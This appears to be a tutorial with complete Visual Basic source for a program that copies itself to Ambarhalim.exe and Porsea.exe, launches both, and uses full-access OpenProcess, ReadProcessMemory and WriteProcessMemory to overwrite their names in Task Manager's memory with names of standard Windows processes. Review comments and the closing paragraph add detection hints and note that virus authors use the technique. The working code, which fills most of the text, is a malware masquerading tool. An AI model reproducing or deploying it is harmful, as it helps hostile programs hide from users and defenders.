Modifiers task manager list

We will build a program that puts a fake program name into the Task Manager list. To change the name shown for our program, it reads Task Manager's process memory with the ReadProcessMemory API function, modifies the data, and writes it back into Task Manager with the WriteProcessMemory API function.

To illustrate this, we will create a program that copies itself into several programs, each of which changes the other's name in the Task Manager.

For example, the program name is Ambarhalim.exe and Porsea.exe.
- Ambarhalim.exe will change the displayed name of Porsea.exe to Services.exe.
- Porsea.exe will change the displayed name of Ambarhalim.exe to explorer.exe.

This project was created using Visual Basic. The steps are as follows:
1. Run the Visual Basic program on your PC.
2. Make 1 listbox (Listbox1) and 1 timer (Timer1) in the form1.
3. Set interval timer value to 500 (0.5 seconds).

In the Form1 code window, enter the source code below.

' Form_Load: runs when the form is loaded.
' If the running executable is not already named "Ambarhalim" or "Porsea", it
' copies its own EXE to Ambarhalim.exe and Porsea.exe in the application
' directory, starts both copies, and ends the original instance.
' NOTE(review): a process that copies its own image under new file names and
' immediately launches the copies is a behaviour worth alerting on; the two
' children share the parent's file hash.
Private Sub Form_Load()
Dim index1 As String
Dim Ambarhalim As String
Dim Porsea As String

' Full path of the currently running executable and of the two copies.
index1 = App.Path & "\" & App.EXEName & ".exe"
Ambarhalim = App.Path & "\Ambarhalim.exe"
Porsea = App.Path & "\Porsea.exe"

' Only the original (differently named) instance takes this branch; the copies skip it.
If App.EXEName <> "Ambarhalim" And App.EXEName <> "Porsea" Then
FileCopy index1, Ambarhalim
FileCopy index1, Porsea
Shell Ambarhalim
Shell Porsea
' Terminate the original instance once both copies have been started.
End
End If
End Sub

In the Timer1 code window, enter the source code below.

' Timer1_Timer: periodic tick handler (the article sets the interval to 500 ms).
' Refreshes the process list when the current second is a multiple of 5, then
' asks Disguise to rewrite the name of the sibling copy.
Private Sub Timer1_Timer()
' Timer is switched off for the duration of the handler and re-enabled at the
' end; presumably to avoid overlapping ticks while DoEvents runs inside Disguise.
Timer1.Enabled = False
If Second(Now) Mod 5 = 0 Then Update
' Each copy targets the other copy's name, replacing it with the name of a
' standard Windows process (masquerading).
If App.EXEName = "Ambarhalim" Then Disguise "Porsea.exe", "Services.exe"
If App.EXEName = "Porsea" Then Disguise "Ambarhalim.exe", "explorer.exe"

Timer1.Enabled = True
End Sub

This project also needs a module file, so add one to the project. In the Module1 code window, enter the source code below.

' Module-level declarations: Toolhelp snapshot flags, the PROCESSENTRY32
' record, the kernel32 imports used below, and two pieces of module state.
Option Explicit

' Snapshot flags for CreateToolhelp32Snapshot. SNAPALL is the OR of the heap
' list (&H1), process (&H2), thread (&H4) and module (&H8) flags.
Const TH32CS_SNAPALL = (&H1 Or &H2 Or &H4 Or &H8)
Const TH32CS_SNAPPROCESS As Long = 2&

' Record filled in by Process32First / Process32Next for each process.
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
' Executable file name, NUL-terminated inside a fixed 260-character buffer.
szExeFile As String * 260
End Type

' kernel32 imports. OpenProcess + ReadProcessMemory + WriteProcessMemory are
' the cross-process memory access calls; on the defensive side this API
' combination against another user's GUI tool is the thing to monitor.
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

' Handle set by InitProcHack and used by REPSTRINGINPROC (0 when the open failed).
Private myHandle As Long
' Bracketed list of process IDs ("[pid][pid]...") recorded by the previous Disguise pass.
Private myproclist$

' Update: rebuild Form1.List1 from a Toolhelp snapshot of the system.
' Each list entry is the executable name up to its first NUL character (an
' empty string when no NUL is found); the entry's ItemData holds the process ID.
' No value is assigned to the function result.
Public Function Update()
Dim snap As Long
Dim entry As PROCESSENTRY32
Dim more As Long
Dim nulPos As Long
Dim exeName As String

Form1.List1.Clear
snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
' dwSize must hold the record size before the first enumeration call.
entry.dwSize = Len(entry)
more = Process32First(snap, entry)
Do While more
    ' szExeFile is a fixed-length buffer; keep only the text before the NUL.
    nulPos = InStr(1, entry.szExeFile, Chr$(0))
    If nulPos > 0 Then
        exeName = Left$(entry.szExeFile, nulPos - 1)
    Else
        exeName = ""
    End If
    With Form1.List1
        .AddItem exeName
        .ItemData(.NewIndex) = entry.th32ProcessID
    End With
    more = Process32Next(snap, entry)
Loop
CloseHandle snap
End Function

' UNICODE: return a copy of data in which every character is preceded by a
' Chr(0) character, so the result is twice as long as the input.
' An empty input yields an empty string.
Private Function UNICODE(data As String) As String
Dim pos As Integer
Dim widened As String

widened = ""
pos = 1
Do While pos <= Len(data)
    ' Emit the zero character first, then the original character.
    widened = widened & Chr(0) & Mid(data, pos, 1)
    pos = pos + 1
Loop
UNICODE = widened
End Function

' InitProcHack: open the process identified by pid and store the handle in
' the module-level myHandle.
' Returns True when OpenProcess gave a non-zero handle, False otherwise
' (myHandle is then reset to 0).
' NOTE(review): &H1F0FFF is the full-access mask (PROCESS_ALL_ACCESS as defined
' for older Windows versions). A handle request with this mask against
' taskmgr.exe from an unrelated user program is a useful detection point.
' NOTE(review): nothing visible in this module calls CloseHandle on myHandle,
' so each successful call leaves an open handle behind.
Private Function InitProcHack(pid As Long) As Boolean
Dim pHandle As Long
pHandle = OpenProcess(&H1F0FFF, False, pid)
If (pHandle = 0) Then
InitProcHack = False
myHandle = 0
Else
InitProcHack = True
myHandle = pHandle
End If
End Function

' REPSTRINGINPROC: in the process with ID PIDX, look for the string Origin and
' overwrite each occurrence found with the string Recent.
' Parameters:
'   PIDX   - process ID to open (Disguise passes the ID of a taskmgr.exe process).
'   Origin - name to search for; passed ByRef and adjusted by Corrective.
'   Recent - replacement name; passed ByRef and adjusted by Corrective.
' Exits without doing anything when the process cannot be opened.
' NOTE(review): the writes land only in the memory of the opened process. The
' code does not touch the disguised program's own image name, so what changes
' is the text held by that process instance, not the process itself.
' NOTE(review): defensive telemetry to look for here is a sweep of
' ReadProcessMemory calls followed by WriteProcessMemory into another process.
Private Sub REPSTRINGINPROC(PIDX As Long, Origin As String, Recent As String)
Dim SRCHSTRING As String
Dim REPSTRING As String
Dim startpos As Integer
Dim p As String
Dim bytewrite As Long

' Opens the target and sets the module-level myHandle.
If Not InitProcHack(PIDX) Then Exit Sub

' c and writelen are declared but not used in this routine.
Dim c As Integer
Dim addr As Long
Dim buffer As String * 30000
Dim readlen As Long
Dim writelen As Long

' Align casing with the entries in Form1.List1 and pad the shorter name.
Corrective Origin, Recent

' Both strings are expanded with a Chr(0) before every character.
SRCHSTRING = UNICODE(Origin)
REPSTRING = UNICODE(Recent)

' Walk the address range in steps of 20000, requesting 20016 bytes per read;
' presumably the extra 16 bytes let a match that straddles two windows be seen.
For addr = 0 To 4000
Call ReadProcessMemory(myHandle, addr * 20000, buffer, 20016, readlen)
If readlen > 0 Then
startpos = 1
While InStr(startpos, buffer, SRCHSTRING) > 0
' Address of the match: window base plus zero-based offset inside the buffer.
p = (addr) * 20000 + InStr(startpos, buffer, SRCHSTRING) - 1
Call WriteProcessMemory(myHandle, CLng(p), REPSTRING, Len(REPSTRING), bytewrite)
' Continue searching one position after the current match.
startpos = InStr(startpos, buffer, Trim(SRCHSTRING)) + 1
Wend
End If
Next addr

DoEvents
' Closes file number 1, although no file is opened anywhere in the visible code.
Close #1
DoEvents
End Sub

' Corrective: adjust the two names in place (both parameters are ByRef).
'   1. If Form1.List1 holds an entry equal to scr ignoring case, scr takes
'      that entry's exact spelling; the same is done for rep.
'   2. If the two names differ in length, space padding is appended to the
'      shorter one.
' No value is assigned to the function result.
Private Function Corrective(scr As String, rep As String)
Dim i As Integer
' Take the casing of the first list entry that matches scr case-insensitively.
For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(scr) Then
scr = Form1.List1.List(i)
Exit For
End If
Next

' Same lookup for the replacement name.
For i = 0 To Form1.List1.ListCount - 1
If LCase(Form1.List1.List(i)) = LCase(rep) Then
rep = Form1.List1.List(i)
Exit For
End If
Next

' Append space padding to whichever name is shorter.
If Len(scr) > Len(rep) Then
rep = rep + Left(" ", Len(scr) - Len(rep))
End If
If Len(rep) > Len(scr) Then
scr = scr + Left(" ", Len(rep) - Len(scr))
End If
End Function

' Disguise: walk a process snapshot and, for every process named "taskmgr.exe"
' whose ID was not recorded by the previous call, run REPSTRINGINPROC twice to
' replace Origin with Recent in that process.
' Parameters:
'   Origin - name to be replaced (for example "Porsea.exe").
'   Recent - name to show instead (for example "Services.exe").
' Side effects: updates the module-level myproclist$ with the IDs seen in this
' pass, so a process already present on the previous pass is skipped next time.
' NOTE(review): mySnapshot is not passed to CloseHandle anywhere in this routine.
' NOTE(review): the replacement names imitate standard Windows processes. When
' triaging, compare the name shown with the image path and parent process
' taken from a source other than the Task Manager window.
Public Sub Disguise(Origin As String, Recent As String)
Dim newproclist$
Dim myProcess As PROCESSENTRY32
Dim mySnapshot As Long

newproclist$ = ""
myProcess.dwSize = Len(myProcess)
mySnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

' First entry of the snapshot is handled separately from the loop below.
Process32First mySnapshot, myProcess

' Skip processes whose ID is already in the list from the previous pass.
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If

newproclist$ = "[" & myProcess.th32ProcessID & "]"

' Remaining entries: same check, and every ID is appended to the new list.
While Process32Next(mySnapshot, myProcess)
If InStr(1, myproclist$, "[" & myProcess.th32ProcessID & "]") = 0 Then
If Left(myProcess.szExeFile, InStr(myProcess.szExeFile, Chr(0)) - 1) = "taskmgr.exe" Then
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
REPSTRINGINPROC myProcess.th32ProcessID, Origin, Recent
Else
DoEvents
End If
End If
newproclist$ = newproclist$ & "[" & myProcess.th32ProcessID & "]"
Wend

' Remember this pass's process IDs for the next call.
myproclist$ = newproclist$
End Sub

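You are free to give this program any name. Virus makers often use this example source code as camouflage so that their program is hard to find. The code only overwrites strings inside the running Task Manager process, so the disguised program's real image name and path are unchanged. Tools that read the process list themselves should still show the real name, and a user program that opens taskmgr.exe with full access and writes to its memory is itself a strong detection signal.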


